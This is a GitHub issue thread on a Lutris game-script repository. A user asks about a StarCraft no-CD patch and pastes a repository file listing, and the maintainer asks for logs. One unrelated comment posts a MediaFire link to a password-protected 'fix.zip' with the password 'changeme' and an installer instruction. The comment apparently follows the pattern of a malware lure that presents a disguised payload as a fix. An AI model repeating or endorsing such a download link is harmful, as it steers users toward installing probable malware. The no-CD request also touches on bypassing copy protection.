### ISSUE TITLE
what features does this add?

### ISSUE THREAD

**Issue by DOOMMARINE117** [legluondunet/MyLittleLutrisScripts#172]
does it add a no cd patch for starcraft?

**Comment by legluondunet** [comment]
Sorry but I don't understand your message, what are you talking about? Please post here the Lutris log file.

**Comment by DOOMMARINE117** [comment]
when you go to the main page for the code of the games and such. when you download the zip of the code for all the games like these: 

[f4c4ad6](https://github.com/legluondunet/MyLittleLutrisScripts/commit/f4c4ad6b7ce255d1b496b2b5b5f8eac54f71477d)
 · 
8 hours ago
History
[.github/ISSUE_TEMPLATE](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/.github/ISSUE_TEMPLATE)
[Update report-issue.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/7f53b7aacc4e791d5f5884a6a1604181bcb6e62c)
last year
[3D Pinball pour Windows – Space Cadet](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/3D%20Pinball%20pour%20Windows%20%E2%80%93%20Space%20Cadet)
[Update README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/f7f8d463d54a988472ab9ee381b075ac9d501d2d)
last year
[8-BIT Hordes](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/8-BIT%20Hordes)
[Update README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/794551ab5088026e38817ce31516c73ea13288fa)
3 months ago
[Age of Empires - Gold Edition](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Age%20of%20Empires%20-%20Gold%20Edition)
[Update Age of Empires - Gold Edition - CD - Upatch HD.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/3146bc642227b5168675930baf7f8f997c696a11)
last month
[Alan Wake](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Alan%20Wake)
[Update Readme.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/45e51416b0607cbadd773f4ec1bdac47559bac55)
7 months ago
[Alone in the Dark - The New Nightmare](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Alone%20in%20the%20Dark%20-%20The%20New%20Nightmare)
[Update README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/8f4534ba1618680918564dff3f97d2022756e38a)
2 months ago
[Alone in the Dark 2](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Alone%20in%20the%20Dark%202)
[modifié : Alone in the Dark 2/README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/9b89a8198aeb8853281c93fcf2ecd66f3ea1a174)
5 years ago
[Alone in the Dark 3](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Alone%20in%20the%20Dark%203)
[modifié : Alone in the Dark 2/README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/9b89a8198aeb8853281c93fcf2ecd66f3ea1a174)
5 years ago
[Alone in the Dark](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Alone%20in%20the%20Dark)
[modifié : Alone in the Dark/README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/8e2e1259a3ebd3ac49cefd1c23564c4ed8084471)
5 years ago
[Assassin's Creed IV - Black Flag](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Assassin's%20Creed%20IV%20-%20Black%20Flag)
[modifié : Assassin's Creed IV - Black Flag/Assassin's Creed IV - Bla…](https://github.com/legluondunet/MyLittleLutrisScripts/commit/727a892b1dfafca89b59e4719812b61b6357ec71)
3 years ago
[Atlantis - The Lost Tales](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Atlantis%20-%20The%20Lost%20Tales)
[Update README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/ca807e072a27ff3d11f94a1981e38bd9c9e58b03)
6 months ago
[Bad Mojo Redux](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Bad%20Mojo%20Redux)
[Update Bad Mojo Redux - GOG.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/9839c77119e651342f329c4feaa9c9d6202e8a6d)
7 months ago
[Bad Mojo](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Bad%20Mojo)
[Update and rename BADMOJO.ini to BADMOJO.ini](https://github.com/legluondunet/MyLittleLutrisScripts/commit/0a8b9ff4bcd2f853ef8dd39fd367cb9e5902f58a)
7 months ago
[Battle Chess - Collection](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Battle%20Chess%20-%20Collection)
[modifié : Battle Chess - Collection/README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/1bf0c6a758ee8ae935b35809a072dd8988194b60)
5 years ago
[Battlefield 1942 - Complete Edition](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Battlefield%201942%20-%20Complete%20Edition)
[Update Battle 1942 - Complete Edition.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/89153b99e7c9ace01341420ea9d1fcdf0c024779)
6 months ago
[Beneath a Steel Sky](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Beneath%20a%20Steel%20Sky)
[modifié : Beneath a Steel Sky/Beneath a Steel Sky - GOG - ScummVM.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/1f65cdf0137756eace61445f3c4b161996ebcd74)
3 years ago
[Beyond Good and Evil](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Beyond%20Good%20and%20Evil)
[Update Beyond Good and Evil - Windows Steam Standalone.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/fc5c90d5bb8ea3b4284c8a0c3ce86e75750ee1b4)
3 months ago
[Blade Runner](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Blade%20Runner)
[supprimé : Beyond Good and Evil/BGE widescreen fix.rar](https://github.com/legluondunet/MyLittleLutrisScripts/commit/193fd8597445f36a2fb1ce3ff564a1a943999025)
4 years ago
[Broken Sword - Shadow of the Templars](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Broken%20Sword%20-%20Shadow%20of%20the%20Templars)
[Update Broken Sword - Shadow of the Templars - CD - ScummVM.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/f096f36f5968f1feaee64cc729e5a815f21b7fc9)
3 years ago
[Caesar III](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Caesar%20III)
[Update Caesar III - GOG - Julius.txt](https://github.com/legluondunet/MyLittleLutrisScripts/commit/3f6973c1fd82b3115244a08ee636bb1a95f00dcf)
6 months ago
[Call of Cthulhu - Prisoner of Ice](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Call%20of%20Cthulhu%20-%20Prisoner%20of%20Ice)
[modifié : Battle Chess - Collection/Battle Chess - Collection - CD -…](https://github.com/legluondunet/MyLittleLutrisScripts/commit/e050c54ce975e64eca924c6b110aecdb0ac3a8be)
5 years ago
[Call of Cthulhu - Shadow of the Comet](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Call%20of%20Cthulhu%20-%20Shadow%20of%20the%20Comet)
[modifié : Battle Chess - Collection/README.md](https://github.com/legluondunet/MyLittleLutrisScripts/commit/1bf0c6a758ee8ae935b35809a072dd8988194b60)
5 years ago
[Cyber Gladiators](https://github.com/legluondunet/MyLittleLutrisScripts/tree/master/Cyber%20Gladiators)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by legluondunet** [comment]
could you explain clearly your issue? and I need log file.
